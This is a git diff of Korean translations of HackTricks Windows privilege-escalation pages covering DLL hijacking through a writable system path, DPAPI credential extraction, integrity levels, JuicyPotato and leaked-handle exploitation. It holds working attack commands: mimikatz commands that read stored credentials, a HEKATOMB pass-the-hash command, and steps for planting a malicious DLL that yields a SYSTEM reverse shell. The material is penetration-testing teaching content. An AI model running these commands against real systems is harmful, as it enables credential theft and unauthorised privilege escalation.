 - [https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e](https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e)
 - [https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html](https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html)
 
-<figure><img src="../../../images/i3.png" alt=""><figcaption></figcaption></figure>
-
-**버그 바운티 팁**: **가입하세요** **Intigriti**에, 해커를 위해 해커가 만든 프리미엄 **버그 바운티 플랫폼**! 오늘 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)에서 저희와 함께하고 최대 **$100,000**의 보상을 받기 시작하세요!
-
-{% embed url="https://go.intigriti.com/hacktricks" %}
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
index 786da5d6b..49592246d 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
@@ -4,9 +4,9 @@
 
 ## Introduction
 
-시스템 경로 폴더에 **쓰기**가 가능하다는 것을 발견했다면(사용자 경로 폴더에 쓸 수 있는 경우에는 작동하지 않음), 시스템에서 **권한 상승**을 할 수 있을 가능성이 있습니다.
+시스템 경로 폴더에 **쓰기**가 가능하다는 것을 발견했다면(사용자 경로 폴더에 쓸 수 있는 경우에는 작동하지 않음을 유의하세요), 시스템에서 **권한 상승**을 할 수 있을 가능성이 있습니다.
 
-이를 위해 **Dll Hijacking**을 악용할 수 있으며, 이는 **당신보다 더 높은 권한**을 가진 서비스나 프로세스에 의해 **로드되는 라이브러리**를 **탈취**하는 것입니다. 그리고 그 서비스가 아마도 시스템 전체에 존재하지 않는 Dll을 로드하려고 시도하기 때문에, 당신이 쓸 수 있는 시스템 경로에서 로드하려고 할 것입니다.
+이를 위해 **Dll Hijacking**을 악용할 수 있으며, 이는 **당신보다 더 높은 권한**을 가진 서비스나 프로세스에 의해 **로드되는 라이브러리**를 **가로채는** 것입니다. 그리고 그 서비스가 아마도 시스템 전체에 존재하지 않는 Dll을 로드하려고 시도하기 때문에, 당신이 쓸 수 있는 시스템 경로에서 로드하려고 할 것입니다.
 
 **Dll Hijacking이 무엇인지**에 대한 더 많은 정보는 다음을 확인하세요:
 
@@ -18,11 +18,11 @@
 
 ### Finding a missing Dll
 
-가장 먼저 필요한 것은 **당신보다 더 높은 권한**으로 실행 중인 **프로세스**를 **식별**하는 것입니다. 이 프로세스는 당신이 쓸 수 있는 시스템 경로에서 **Dll을 로드하려고** 하고 있습니다.
+가장 먼저 해야 할 일은 **당신보다 더 높은 권한**으로 실행 중인 **프로세스**를 **식별**하는 것입니다. 이 프로세스는 당신이 쓸 수 있는 시스템 경로에서 **Dll을 로드하려고** 하고 있습니다.
 
-이 경우의 문제는 아마도 그 프로세스들이 이미 실행 중이라는 것입니다. 필요한 서비스의 부족한 Dll을 찾기 위해서는 프로세스가 로드되기 전에 가능한 한 빨리 procmon을 실행해야 합니다. 따라서 부족한 .dll을 찾기 위해 다음을 수행하세요:
+이 경우의 문제는 아마도 그 프로세스들이 이미 실행 중이라는 것입니다. 필요한 서비스의 부족한 Dll을 찾기 위해서는 프로세스가 로드되기 전에 가능한 한 빨리 procmon을 실행해야 합니다. 따라서 부족한 .dll을 찾으려면 다음을 수행하세요:
 
-- **폴더** `C:\privesc_hijacking`를 **생성**하고 `C:\privesc_hijacking` 경로를 **시스템 경로 환경 변수**에 추가하세요. 이는 **수동으로** 또는 **PS**를 사용하여 할 수 있습니다:
+- `C:\privesc_hijacking` 폴더를 **생성**하고 `C:\privesc_hijacking` 경로를 **시스템 경로 환경 변수**에 추가하세요. 이는 **수동으로** 하거나 **PS**를 사용하여 할 수 있습니다:
 ```powershell
 # Set the folder path to create and check events for
 $folderPath = "C:\privesc_hijacking"
@@ -41,15 +41,15 @@ $newPath = "$envPath;$folderPath"
 ```
 - **`procmon`**을 실행하고 **`Options`** --> **`Enable boot logging`**으로 이동한 후 프롬프트에서 **`OK`**를 누릅니다.
 - 그런 다음 **재부팅**합니다. 컴퓨터가 재시작되면 **`procmon`**이 가능한 한 빨리 **이벤트를 기록**하기 시작합니다.
-- **Windows**가 **시작된 후 `procmon`을 다시 실행**하면 실행 중임을 알려주고 **이벤트를 파일에 저장할 것인지 묻습니다**. **예**라고 말하고 **이벤트를 파일에 저장**합니다.
-- **파일이 생성된 후**, 열린 **`procmon`** 창을 **닫고 이벤트 파일을 엽니다**.
+- **Windows**가 **시작된 후 `procmon`**을 다시 실행하면 실행 중임을 알려주고 **이벤트를 파일에 저장할 것인지 묻습니다**. **예**라고 말하고 **이벤트를 파일에 저장**합니다.
+- **파일**이 **생성된 후**, 열린 **`procmon`** 창을 **닫고 이벤트 파일을 엽니다**.
 - 이러한 **필터**를 추가하면 어떤 **프로세스가 쓰기 가능한 시스템 경로 폴더에서 Dll을 로드하려고 했는지** 알 수 있습니다:
 
 <figure><img src="../../../images/image (945).png" alt=""><figcaption></figcaption></figure>
 
 ### 놓친 Dlls
 
-무료 **가상 (vmware) Windows 11 머신**에서 이 작업을 실행했을 때 다음과 같은 결과를 얻었습니다:
+무료 **가상 (vmware) Windows 11 머신**에서 실행했을 때 다음과 같은 결과를 얻었습니다:
 
 <figure><img src="../../../images/image (607).png" alt=""><figcaption></figcaption></figure>
 
@@ -61,11 +61,11 @@ $newPath = "$envPath;$folderPath"
 | 진단 정책 서비스 (DPS)         | Unknown.DLL        | `C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS` |
 | ???                             | SharedRes.dll      | `C:\Windows\system32\svchost.exe -k UnistackSvcGroup`                |
 
-이것을 찾은 후, [**WptsExtensions.dll을 악용하는 방법**](https://juggernaut-sec.com/dll-hijacking/#Windows_10_Phantom_DLL_Hijacking_-_WptsExtensionsdll)에 대해서도 설명하는 흥미로운 블로그 게시물을 발견했습니다. 이것이 우리가 **지금 하려는 일**입니다.
+이것을 찾은 후, [**WptsExtensions.dll을 이용한 privesc 방법**](https://juggernaut-sec.com/dll-hijacking/#Windows_10_Phantom_DLL_Hijacking_-_WptsExtensionsdll)을 설명하는 흥미로운 블로그 게시물을 발견했습니다. 이것이 우리가 **지금 하려는 일**입니다.
 
 ### 악용
 
-따라서 **권한을 상승시키기 위해** 라이브러리 **WptsExtensions.dll**을 하이재킹할 것입니다. **경로**와 **이름**을 알았으니 이제 **악성 dll을 생성**하기만 하면 됩니다.
+따라서 **권한을 상승시키기 위해** 우리는 라이브러리 **WptsExtensions.dll**을 하이재킹할 것입니다. **경로**와 **이름**을 알았으니 이제 **악성 dll을 생성**하기만 하면 됩니다.
 
 [**이 예제 중 하나를 사용해 볼 수 있습니다**](./#creating-and-compiling-dlls). 리버스 쉘을 얻거나, 사용자를 추가하거나, 비콘을 실행하는 등의 페이로드를 실행할 수 있습니다...
 
@@ -75,7 +75,7 @@ $newPath = "$envPath;$folderPath"
 
 이 글을 작성할 당시 **작업 스케줄러** 서비스는 **Nt AUTHORITY\SYSTEM**으로 실행되고 있습니다.
 
-**악성 Dll을 생성한 후** (_제 경우 x64 리버스 쉘을 사용했으며 쉘을 받았지만 defender가 msfvenom에서 온 것이기 때문에 이를 차단했습니다_), 쓰기 가능한 시스템 경로에 **WptsExtensions.dll**이라는 이름으로 저장하고 **컴퓨터를 재시작**합니다 (또는 서비스를 재시작하거나 영향을 받는 서비스/프로그램을 다시 실행하기 위해 필요한 모든 작업을 수행합니다).
+**악성 Dll을 생성한 후** (_제 경우 x64 리버스 쉘을 사용했으며 쉘을 받았지만 defender가 msfvenom에서 온 것이기 때문에 이를 차단했습니다_), 쓰기 가능한 시스템 경로에 **WptsExtensions.dll**이라는 이름으로 저장하고 **컴퓨터를 재시작**합니다 (또는 서비스를 재시작하거나 영향을 받는 서비스/프로그램을 다시 실행하기 위해 필요한 작업을 수행합니다).
 
 서비스가 재시작되면 **dll이 로드되고 실행되어야 합니다** (이때 **procmon** 트릭을 재사용하여 **라이브러리가 예상대로 로드되었는지 확인할 수 있습니다**).
 
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md b/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
index af56d2111..7c0a31c5c 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
@@ -6,7 +6,7 @@
 
 ## DPAPI란 무엇인가
 
-데이터 보호 API(DPAPI)는 주로 Windows 운영 체제 내에서 **비대칭 개인 키의 대칭 암호화**에 사용되며, 사용자 또는 시스템 비밀을 중요한 엔트로피 소스로 활용합니다. 이 접근 방식은 개발자가 사용자 로그인 비밀에서 파생된 키를 사용하여 데이터를 암호화할 수 있게 하여 암호화 관리를 단순화합니다. 시스템 암호화의 경우, 시스템의 도메인 인증 비밀을 사용하여 개발자가 암호화 키 보호를 직접 관리할 필요가 없도록 합니다.
+데이터 보호 API(DPAPI)는 주로 Windows 운영 체제 내에서 **비대칭 개인 키의 대칭 암호화**에 사용되며, 사용자 또는 시스템 비밀을 중요한 엔트로피 소스로 활용합니다. 이 접근 방식은 개발자가 사용자의 로그인 비밀에서 파생된 키를 사용하여 데이터를 암호화할 수 있게 하여 암호화를 단순화하며, 시스템 암호화의 경우 시스템의 도메인 인증 비밀을 사용하여 개발자가 암호화 키의 보호를 직접 관리할 필요를 없애줍니다.
 
 ### DPAPI에 의해 보호되는 데이터
 
@@ -16,7 +16,7 @@ DPAPI에 의해 보호되는 개인 데이터는 다음과 같습니다:
 - Outlook 및 Windows Mail과 같은 애플리케이션의 이메일 및 내부 FTP 계정 비밀번호
 - 공유 폴더, 리소스, 무선 네트워크 및 Windows Vault의 비밀번호, 암호화 키 포함
 - 원격 데스크톱 연결, .NET Passport 및 다양한 암호화 및 인증 목적을 위한 개인 키의 비밀번호
-- Credential Manager에 의해 관리되는 네트워크 비밀번호 및 CryptProtectData를 사용하는 애플리케이션의 개인 데이터, 예: Skype, MSN 메신저 등
+- Credential Manager에 의해 관리되는 네트워크 비밀번호 및 CryptProtectData를 사용하는 애플리케이션의 개인 데이터, 예를 들어 Skype, MSN 메신저 등
 
 ## 목록 금고
 ```bash
@@ -28,14 +28,14 @@ mimikatz vault::list
 ```
 ## Credential Files
 
-The **credentials files protected** could be located in:
+**자격 증명 파일 보호**는 다음 위치에 있을 수 있습니다:
 ```
 dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\
 dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\
 Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
 Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
 ```
-mimikatz `dpapi::cred`를 사용하여 자격 증명 정보를 가져오면, 응답에서 암호화된 데이터 및 guidMasterKey와 같은 흥미로운 정보를 찾을 수 있습니다.
+mimikatz `dpapi::cred`를 사용하여 자격 증명 정보를 가져오면, 응답에서 암호화된 데이터와 guidMasterKey와 같은 흥미로운 정보를 찾을 수 있습니다.
 ```bash
 mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\28350839752B38B238E5D56FDD7891A7
 
@@ -49,9 +49,9 @@ pbData             : b8f619[...snip...]b493fe
 ```
 dpapi::cred /in:C:\path\to\encrypted\file /masterkey:<MASTERKEY>
 ```
-## Master Keys
+## 마스터 키
 
-DPAPI를 사용하여 사용자의 RSA 키를 암호화하는 키는 `%APPDATA%\Microsoft\Protect\{SID}` 디렉토리에 저장되며, 여기서 {SID}는 그 사용자의 [**보안 식별자**](https://en.wikipedia.org/wiki/Security_Identifier) **입니다**. **DPAPI 키는 사용자의 개인 키를 보호하는 마스터 키와 동일한 파일에 저장됩니다**. 일반적으로 64바이트의 임의 데이터입니다. (이 디렉토리는 보호되어 있으므로 cmd에서 `dir`을 사용하여 나열할 수 없지만 PS에서 나열할 수 있습니다).
+사용자의 RSA 키를 암호화하는 데 사용되는 DPAPI 키는 `%APPDATA%\Microsoft\Protect\{SID}` 디렉토리에 저장되며, 여기서 {SID}는 해당 사용자의 [**보안 식별자**](https://en.wikipedia.org/wiki/Security_Identifier)입니다. **DPAPI 키는 사용자의 개인 키를 보호하는 마스터 키와 동일한 파일에 저장됩니다**. 일반적으로 64바이트의 임의 데이터입니다. (이 디렉토리는 보호되므로 cmd에서 `dir`을 사용하여 나열할 수 없지만 PS에서 나열할 수 있습니다).
 ```bash
 Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
 Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect
@@ -60,7 +60,7 @@ Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\
 Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\{SID}
 Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\{SID}
 ```
-사용자의 마스터 키 모음은 다음과 같이 보입니다:
+사용자의 마스터 키 모음은 다음과 같습니다:
 
 ![](<../../images/image (1121).png>)
 
@@ -76,7 +76,7 @@ Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\{SID}
 
 ## HEKATOMB
 
-[**HEKATOMB**](https://github.com/Processus-Thief/HEKATOMB)는 LDAP 디렉토리에서 모든 사용자와 컴퓨터를 추출하고 RPC를 통해 도메인 컨트롤러 백업 키를 추출하는 작업을 자동화하는 도구입니다. 스크립트는 모든 컴퓨터의 IP 주소를 해결한 다음 모든 컴퓨터에서 smbclient를 수행하여 모든 사용자의 DPAPI 블롭을 검색하고 도메인 백업 키로 모든 것을 복호화합니다.
+[**HEKATOMB**](https://github.com/Processus-Thief/HEKATOMB)는 LDAP 디렉토리에서 모든 사용자와 컴퓨터를 추출하고 RPC를 통해 도메인 컨트롤러 백업 키를 추출하는 작업을 자동화하는 도구입니다. 스크립트는 모든 컴퓨터의 IP 주소를 해결한 후 모든 컴퓨터에서 smbclient를 수행하여 모든 사용자의 DPAPI 블롭을 검색하고 도메인 백업 키로 모든 것을 복호화합니다.
 
 `python3 hekatomb.py -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp`
 
diff --git a/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md b/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
index 4a15f3c98..be7ff2ef3 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
@@ -1,18 +1,18 @@
-# Integrity Levels
+# 무결성 수준
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Integrity Levels
+## 무결성 수준
 
 Windows Vista 및 이후 버전에서는 모든 보호된 항목에 **무결성 수준** 태그가 있습니다. 이 설정은 대부분의 파일과 레지스트리 키에 "중간" 무결성 수준을 할당하며, Internet Explorer 7이 낮은 무결성 수준에서 쓸 수 있는 특정 폴더와 파일을 제외합니다. 기본 동작은 표준 사용자가 시작한 프로세스가 중간 무결성 수준을 가지며, 서비스는 일반적으로 시스템 무결성 수준에서 작동합니다. 높은 무결성 레이블은 루트 디렉터리를 보호합니다.
 
-주요 규칙은 객체의 수준보다 낮은 무결성 수준을 가진 프로세스가 객체를 수정할 수 없다는 것입니다. 무결성 수준은 다음과 같습니다:
+주요 규칙은 객체의 무결성 수준보다 낮은 무결성 수준을 가진 프로세스가 객체를 수정할 수 없다는 것입니다. 무결성 수준은 다음과 같습니다:
 
 - **신뢰할 수 없음**: 이 수준은 익명 로그인이 있는 프로세스를 위한 것입니다. %%%예: Chrome%%%
 - **낮음**: 주로 인터넷 상호작용을 위해, 특히 Internet Explorer의 보호 모드에서 관련 파일 및 프로세스와 **임시 인터넷 폴더**와 같은 특정 폴더에 영향을 미칩니다. 낮은 무결성 프로세스는 레지스트리 쓰기 접근 및 제한된 사용자 프로필 쓰기 접근을 포함하여 상당한 제한을 받습니다.
-- **중간**: 대부분의 활동에 대한 기본 수준으로, 표준 사용자 및 특정 무결성 수준이 없는 객체에 할당됩니다. 관리자의 그룹 구성원조차도 기본적으로 이 수준에서 작동합니다.
+- **중간**: 대부분의 활동에 대한 기본 수준으로, 표준 사용자 및 특정 무결성 수준이 없는 객체에 할당됩니다. 관리자의 그룹 구성원조차 기본적으로 이 수준에서 작동합니다.
 - **높음**: 관리자를 위해 예약되어 있으며, 이 수준의 객체를 포함하여 낮은 무결성 수준의 객체를 수정할 수 있습니다.
-- **시스템**: Windows 커널 및 핵심 서비스의 가장 높은 운영 수준으로, 관리자조차도 접근할 수 없으며, 중요한 시스템 기능을 보호합니다.
+- **시스템**: Windows 커널 및 핵심 서비스의 가장 높은 운영 수준으로, 관리자조차 접근할 수 없으며, 중요한 시스템 기능을 보호합니다.
 - **설치 프로그램**: 모든 다른 수준 위에 있는 고유한 수준으로, 이 수준의 객체가 다른 모든 객체를 제거할 수 있게 합니다.
 
 **Process Explorer**를 사용하여 프로세스의 무결성 수준을 확인할 수 있으며, 프로세스의 **속성**에 접근하고 "**보안**" 탭을 볼 수 있습니다:
@@ -25,7 +25,7 @@ Windows Vista 및 이후 버전에서는 모든 보호된 항목에 **무결성
 
 ### 파일 시스템의 무결성 수준
 
-파일 시스템 내의 객체는 **최소 무결성 수준 요구 사항**이 필요할 수 있으며, 프로세스가 이 무결성 수준을 가지지 않으면 객체와 상호작용할 수 없습니다.\
+파일 시스템 내의 객체는 **최소 무결성 수준 요구 사항**이 필요할 수 있으며, 프로세스가 이 무결성 수준을 가지지 않으면 상호작용할 수 없습니다.\
 예를 들어, **일반 사용자 콘솔에서 일반 파일을 생성하고 권한을 확인해 보겠습니다**:
 ```
 echo asd >asd.txt
@@ -37,7 +37,7 @@ NT AUTHORITY\INTERACTIVE:(I)(M,DC)
 NT AUTHORITY\SERVICE:(I)(M,DC)
 NT AUTHORITY\BATCH:(I)(M,DC)
 ```
-이제 파일에 최소 무결성 수준을 **높음**으로 설정합시다. 이는 **관리자**로 실행되는 **콘솔**에서 **반드시 수행해야** 하며, **일반 콘솔**은 중간 무결성 수준에서 실행되므로 객체에 높은 무결성 수준을 할당할 수 **없습니다**.
+이제 파일에 최소 무결성 수준을 **높음**으로 설정합시다. 이는 **관리자로 실행되는 콘솔**에서 **반드시 수행해야** 하며, **일반 콘솔**은 중간 무결성 수준에서 실행되므로 객체에 높은 무결성 수준을 할당할 수 없습니다:
 ```
 icacls asd.txt /setintegritylevel(oi)(ci) High
 processed file: asd.txt
@@ -52,7 +52,7 @@ NT AUTHORITY\SERVICE:(I)(M,DC)
 NT AUTHORITY\BATCH:(I)(M,DC)
 Mandatory Label\High Mandatory Level:(NW)
 ```
-여기서 흥미로운 점이 발생합니다. 사용자 `DESKTOP-IDJHTKP\user`가 파일에 대해 **전체 권한**을 가지고 있는 것을 볼 수 있습니다(실제로 이 사용자가 파일을 생성한 사용자입니다). 그러나 최소 무결성 수준이 적용되었기 때문에 그는 더 이상 파일을 수정할 수 없으며, High Integrity Level 내에서 실행하지 않는 한 수정할 수 없습니다(읽는 것은 가능하다는 점에 유의하십시오):
+여기서 흥미로운 점이 발생합니다. 사용자 `DESKTOP-IDJHTKP\user`가 파일에 대해 **전체 권한**을 가지고 있는 것을 볼 수 있습니다(실제로 이 사용자가 파일을 생성한 사용자입니다). 그러나 구현된 최소 무결성 수준으로 인해 그는 더 이상 파일을 수정할 수 없으며, High Integrity Level 내에서 실행하지 않는 한 수정할 수 없습니다(읽는 것은 가능하다는 점에 유의하십시오):
 ```
 echo 1234 > asd.txt
 Access is denied.
diff --git a/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md b/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md
index 907878326..a341dd078 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md
@@ -48,9 +48,7 @@ JuicyPotato를 사용하면:
 - **프로세스 인수** _실행된 프로세스 인수를 사용자 정의하세요_
 - **RPC 서버 주소** _은밀한 접근을 위해 외부 RPC 서버에 인증할 수 있습니다_
 - **RPC 서버 포트** _외부 서버에 인증하고 방화벽이 포트 `135`를 차단하는 경우 유용합니다…_
-- **테스트 모드** _주로 테스트 목적으로, 즉 CLSID 테스트. DCOM을 생성하고 토큰의 사용자를 출력합니다. _[_테스트를 위한 여기_](http://ohpe.it/juicy-potato/Test/)를 참조하세요._
-
-### 사용법 <a href="#usage" id="usage"></a>
+- **테스트 모드** _주로 테스트 목적으로, 즉 CLSID 테스트. DCOM을 생성하고 토큰의 사용자를 출력합니다. _[_테스트용 여기_](http://ohpe.it/juicy-potato/Test/)
 ```
 T:\>JuicyPotato.exe
 JuicyPotato v0.1
@@ -114,11 +112,11 @@ c:\Users\Public>
 
 먼저, juicypotato.exe 외에 몇 가지 실행 파일이 필요합니다.
 
-[Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1)를 다운로드하고 PS 세션에 로드한 후, [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1)를 다운로드하여 실행합니다. 이 스크립트는 테스트할 수 있는 가능한 CLSID 목록을 생성합니다.
+[Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1)를 다운로드하고 PS 세션에 로드한 후, [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1)을 다운로드하여 실행합니다. 이 스크립트는 테스트할 수 있는 CLSID 목록을 생성합니다.
 
-그런 다음 [test_clsid.bat](https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat)를 다운로드하고 (CLSID 목록과 juicypotato 실행 파일의 경로를 변경) 실행합니다. 이 스크립트는 모든 CLSID를 시도하기 시작하며, **포트 번호가 변경되면 CLSID가 작동했음을 의미합니다**.
+그런 다음 [test_clsid.bat](https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat)(CLSID 목록과 juicypotato 실행 파일의 경로를 변경) 을 다운로드하고 실행합니다. 이 스크립트는 모든 CLSID를 시도하기 시작하며, **포트 번호가 변경되면 CLSID가 작동했음을 의미합니다**.
 
-**매개변수 -c를 사용하여** 작동하는 CLSID를 **확인하십시오.**
+**-c 매개변수를 사용하여** 작동하는 CLSID를 **확인하십시오.**
 
 ## 참고 문헌
 
diff --git a/src/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md b/src/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
index 39e4db81b..aa28f6fe8 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
@@ -16,6 +16,75 @@
 ## **Interesting Handles**
 
 ### **Process**
+
+초기 예제에서 읽었듯이, **비특권 프로세스가 특권 프로세스의 프로세스 핸들을 상속받으면** 충분한 권한이 있을 경우 **임의의 코드를 실행할 수 있습니다**.
+
+[**이 훌륭한 기사**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)에서 다음 권한 중 하나라도 가진 프로세스 핸들을 어떻게 악용할 수 있는지 확인할 수 있습니다:
+
+- PROCESS_ALL_ACCESS
+- PROCESS_CREATE_PROCESS
+- PROCESS_CREATE_THREAD
+- PROCESS_DUP_HANDLE
+- PROCESS_VM_WRITE
+
+### Thread
+
+프로세스 핸들과 유사하게, **비특권 프로세스가 특권 프로세스의 스레드 핸들을 상속받으면** 충분한 권한이 있을 경우 **임의의 코드를 실행할 수 있습니다**.
+
+[**이 훌륭한 기사**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)에서 다음 권한 중 하나라도 가진 프로세스 핸들을 어떻게 악용할 수 있는지 확인할 수 있습니다:
+
+- THREAD_ALL_ACCESS
+- THREAD_DIRECT_IMPERSONATION
+- THREAD_SET_CONTEXT
+
+### File, Key & Section Handles
+
+**비특권 프로세스가** **특권 파일 또는 레지스트리에 대한** **쓰기** 동등 **권한**을 가진 **핸들을 상속받으면**, 파일/레지스트리를 **덮어쓸 수 있습니다** (그리고 많은 **운이 좋다면**, **권한을 상승시킬 수 있습니다**).
+
+**섹션 핸들**은 파일 핸들과 유사하며, 이러한 종류의 [객체의 일반적인 이름은 **"파일 매핑"**](https://docs.microsoft.com/en-us/windows/win32/memory/file-mapping)입니다. 이는 **전체** 파일을 메모리에 유지하지 않고 **큰 파일**을 작업하는 데 사용됩니다. 이는 파일 핸들의 악용과 "유사한" 방식으로 악용됩니다.
+
+## How to see handles of processes
+
+### Process Hacker
+
+[**Process Hacker**](https://github.com/processhacker/processhacker)는 무료로 다운로드할 수 있는 도구입니다. 프로세스를 검사할 수 있는 여러 놀라운 옵션이 있으며, 그 중 하나는 **각 프로세스의 핸들을 볼 수 있는 기능**입니다.
+
+모든 프로세스의 모든 핸들을 **보려면 SeDebugPrivilege가 필요합니다** (따라서 Process Hacker를 관리자 권한으로 실행해야 합니다).
+
+프로세스의 핸들을 보려면 프로세스를 마우스 오른쪽 버튼으로 클릭하고 핸들을 선택합니다:
+
+![](<../../images/image (616).png>)
+
+그런 다음 핸들을 마우스 오른쪽 버튼으로 클릭하고 **권한을 확인**할 수 있습니다:
+
+![](<../../images/image (946).png>)
+
+### Sysinternals Handles
+
+[**Handles**](https://docs.microsoft.com/en-us/sysinternals/downloads/handle) 바이너리는 Sysinternals에서 콘솔에서 프로세스별 핸들을 나열합니다:
+
+![](<../../images/image (720).png>)
+
+### LeakedHandlesFinder
+
+[**이 도구**](https://github.com/lab52io/LeakedHandlesFinder)는 누출된 **핸들**을 **모니터링**하고 심지어 **자동으로 악용**하여 권한을 상승시킬 수 있게 해줍니다.
+
+### Methodology
+
+이제 프로세스의 핸들을 찾는 방법을 알았으므로, 확인해야 할 것은 **비특권 프로세스가 특권 핸들에 접근하고 있는지**입니다. 그런 경우, 프로세스의 사용자가 핸들을 얻고 이를 악용하여 권한을 상승시킬 수 있습니다.
+
+> [!WARNING]
+> 모든 핸들에 접근하려면 SeDebugPrivilege가 필요하다고 이전에 언급되었습니다. 그러나 **사용자는 자신의 프로세스의 핸들에 여전히 접근할 수 있으므로**, 해당 사용자로부터 권한 상승을 원할 경우 **사용자의 일반 권한으로 도구를 실행하는 것이 유용할 수 있습니다**.
+>
+> ```bash
+> handle64.exe /a | findstr /r /i "process thread file key pid:"
+> ```
+
+## Vulnerable Example
+
+예를 들어, 다음 코드는 **취약한 Windows 서비스**에 속합니다. 이 서비스 바이너리의 취약한 코드는 **`Exploit`** 함수 내부에 위치합니다. 이 함수는 **전체 접근 권한으로 새로운 핸들 프로세스를 생성**하기 시작합니다. 그런 다음, **저권한 프로세스**를 **생성하고** (_explorer.exe_의 저권한 토큰을 복사하여) _C:\users\username\desktop\client.exe_를 실행합니다. **취약점은 `bInheritHandles`를 `TRUE`로 설정하여 저권한 프로세스를 생성하는 데 있습니다**.
+
+따라서 이 저권한 프로세스는 먼저 생성된 고권한 프로세스의 핸들을 잡고 쉘코드를 주입하고 실행할 수 있습니다 (다음 섹션 참조).
 ```c
 #include <windows.h>
 #include <tlhelp32.h>
@@ -224,10 +293,10 @@ return 0;
 ### Exploit Example 1
 
 > [!NOTE]
-> 실제 시나리오에서는 취약한 코드에 의해 실행될 **이진 파일을 제어할 수 없을 가능성이 높습니다** (_C:\users\username\desktop\client.exe_의 경우). 아마도 **프로세스를 손상시키고 권한이 있는 프로세스의 취약한 핸들에 접근할 수 있는지 확인해야 할 것입니다**.
+> 실제 시나리오에서는 취약한 코드에 의해 실행될 **이진 파일을 제어할 수 없을 것입니다** (_C:\users\username\desktop\client.exe_의 경우). 아마도 **프로세스를 손상시키고 권한이 있는 프로세스의 취약한 핸들에 접근할 수 있는지 확인해야 할 것입니다**.
 
 이 예제에서는 _C:\users\username\desktop\client.exe_에 대한 가능한 익스플로잇의 코드를 찾을 수 있습니다.\
-이 코드에서 가장 흥미로운 부분은 `GetVulnProcHandle`에 있습니다. 이 함수는 **모든 핸들을 가져오기 시작한 다음**, **그 중 어떤 것이 동일한 PID에 속하는지 확인하고 핸들이 **프로세스**에 속하는지 확인합니다**. 이러한 모든 요구 사항이 충족되면 (접근 가능한 열린 프로세스 핸들이 발견되면), **프로세스의 핸들을 악용하여 셸코드를 주입하고 실행하려고 시도합니다**.\
+이 코드의 가장 흥미로운 부분은 `GetVulnProcHandle`에 있습니다. 이 함수는 **모든 핸들을 가져오기 시작한 다음**, **그 중 어떤 것이 동일한 PID에 속하는지 확인하고 핸들이 **프로세스**에 속하는지 확인합니다**. 이러한 모든 요구 사항이 충족되면 (접근 가능한 열린 프로세스 핸들이 발견되면), **프로세스의 핸들을 악용하여 셸코드를 주입하고 실행하려고 시도합니다**.\
 셸코드의 주입은 **`Inject`** 함수 내에서 수행되며, **권한이 있는 프로세스 내에 셸코드를 작성하고 동일한 프로세스 내에 스레드를 생성하여 셸코드를 실행합니다**.
 ```c
 #include <windows.h>
@@ -438,7 +507,7 @@ return 0;
 
 이 예제에서는 **열려 있는 핸들을 악용하여** 쉘코드를 주입하고 실행하는 대신, **권한이 있는 열린 핸들 프로세스의 토큰을 사용하여 새로운 프로세스를 생성할 것입니다**. 이는 138행에서 148행까지 수행됩니다.
 
